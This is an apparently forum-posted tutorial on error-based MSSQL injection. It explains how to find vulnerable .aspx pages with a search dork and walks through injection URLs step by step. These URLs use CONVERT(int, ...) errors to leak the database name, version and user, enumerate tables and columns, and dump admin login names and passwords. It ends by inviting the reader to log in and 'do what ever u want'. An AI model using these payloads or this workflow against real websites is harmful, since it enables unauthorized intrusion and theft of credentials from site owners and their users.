MSSQL INJECTION IN DEPTH

Assalam o Alaikum Friends !

i will try my best to explain everything upto my knowledge..
this is error bases mssql.. im learning union based mssql but till now im unable to figure out how to do that Huh
so with error base mssql first do some basics
in sql
1=1 is true
1=0 mean false
or
1=(statement which returns true) is true and in true case page will load fine
1=(statement which returns false) is false and in false case page will display an error

CASTING in MSSQL
there are two casting function in MSSQL
Cast()
usage: cast(value as int/nchar/char/varchar/nvarchar)
CONVERT()
usage: CONVERT(int/nchar/char/varchar/nvarchar, value)

and if we use
1=CONVERT(int,(a value whis in not number/integer)) this will return with an error
and this is magical as it will display our desired result in errors jux like ERROR Based Query in mysql

so lets start
dork to find mssql vuln website is .aspx? id= for [bing]

when u get a website u place a single quote ( ' ) after id and u will get an error like this..

[Image: image.jpg]

why it gives an error
as im also learning .NET
in .NET
some lazy developers use query like this

select * from tblname where id=' "+ txtIDBox.txt +" ';

so if we see it carefully we can exploit this by adding our queries in txtIDBox.txt which in this case is our URL

IDENTIFY the error
error must be related to SQL
like in this case
System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string '12''.
Incorrect syntax near '12''
and System.Data.SqlClient.SqlException is responsible to handle all the errors related to MSSQL


i think this is enough
lets get some basic info about the Database first
use DB_NAME() to see the database name
site.com/some.aspx?parameter=1 and 1=CONVERT(int,DBNAME())--
and remeber DB_NAME() returns a string value which cannot b converted into integer so it throw an error with Database Name also
u can use DB_NAME(1) to see the next and u can go on DB_NAME(2) DB_NAME(3) DB_NAME(4) to see all database..

[Image: image.jpg]


Now version with @@version
site.com/some.aspx?parameter=1 and 1=CONVERT(int,(@@version))--


[Image: image.jpg]


Now database user name
with USER_NAME()
site.com/some.aspx?parameter=1 and 1=CONVERT(int,(USER_NAME()))--

[Image: image.jpg]

now start enumerating tables

there is no limit function in MSSQL
we will use TOP 1
site.com/some.aspx?parameter=1 and 1=CONVERT(int,(Select TOP 1 table_name from information_schema.tables))--


[Image: image.jpg]


well we got our first table now go for second

site.com/some.aspx?parameter=1 and 1=CONVERT(int,(Select TOP 1 table_name from information_schema.tables where table_name not in ('table1')))--

[Image: image.jpg]

and we got our second table in this way we will enumerate all the tables

lets move directly to our favourite table tbladmin
site.com/some.aspx?parameter=1 and 1=CONVERT(int,(Select TOP 1 table_name from information_schema.tables where table_name not in ('table1','tbl2','tbl3','tbl4')))--

[Image: image.jpg]


well we got Admin table so lets start enumerating columns for the admin table
site.com/some.aspx?parameter=1 and 1=CONVERT(int,(Select TOP 1 column_name from information_schema.columns where table_name ='tbladmin' ))--

and it will show us the first column of admin table

[Image: image.jpg]


for second column
site.com/some.aspx?parameter=1 and 1=CONVERT(int,(Select TOP 1 column_name from information_schema.columns where table_name ='tbladmin' and column_name not in ('nid')))--

[Image: image.jpg]

now we got second column now lets grab the next column

site.com/some.aspx?parameter=1 and 1=CONVERT(int,(Select TOP 1 column_name from information_schema.columns where table_name ='tbladmin' and column_name not in ('nid','loginid')))--


[Image: image.jpg]


now we got our required column now dumping data from these columns
site.com/some.aspx?parameter=1 and 1=CONVERT(int,(Select TOP 1 loginid from admin))--

[Image: image.jpg]


we got username now lets get password
site.com/some.aspx?parameter=1 and 1=CONVERT(int,(Select TOP 1 password from admin))--

[Image: image.jpg]


well we got our required information now login and do what ever u want..
if u want to see the second username u will use the same method which u used for table_name and column_name i.e.
site.com/some.aspx?parameter=1 and 1=CONVERT(int,(Select TOP 1 loginid from admin where loginid not in('admin')))--

and same for all other columns..
hope u got this..


(well this is 3rd time with me that i injected a site with patience and username and password is admin Angry but this is not about getting access to the site rather this is about injecting MSSQL server)

Comments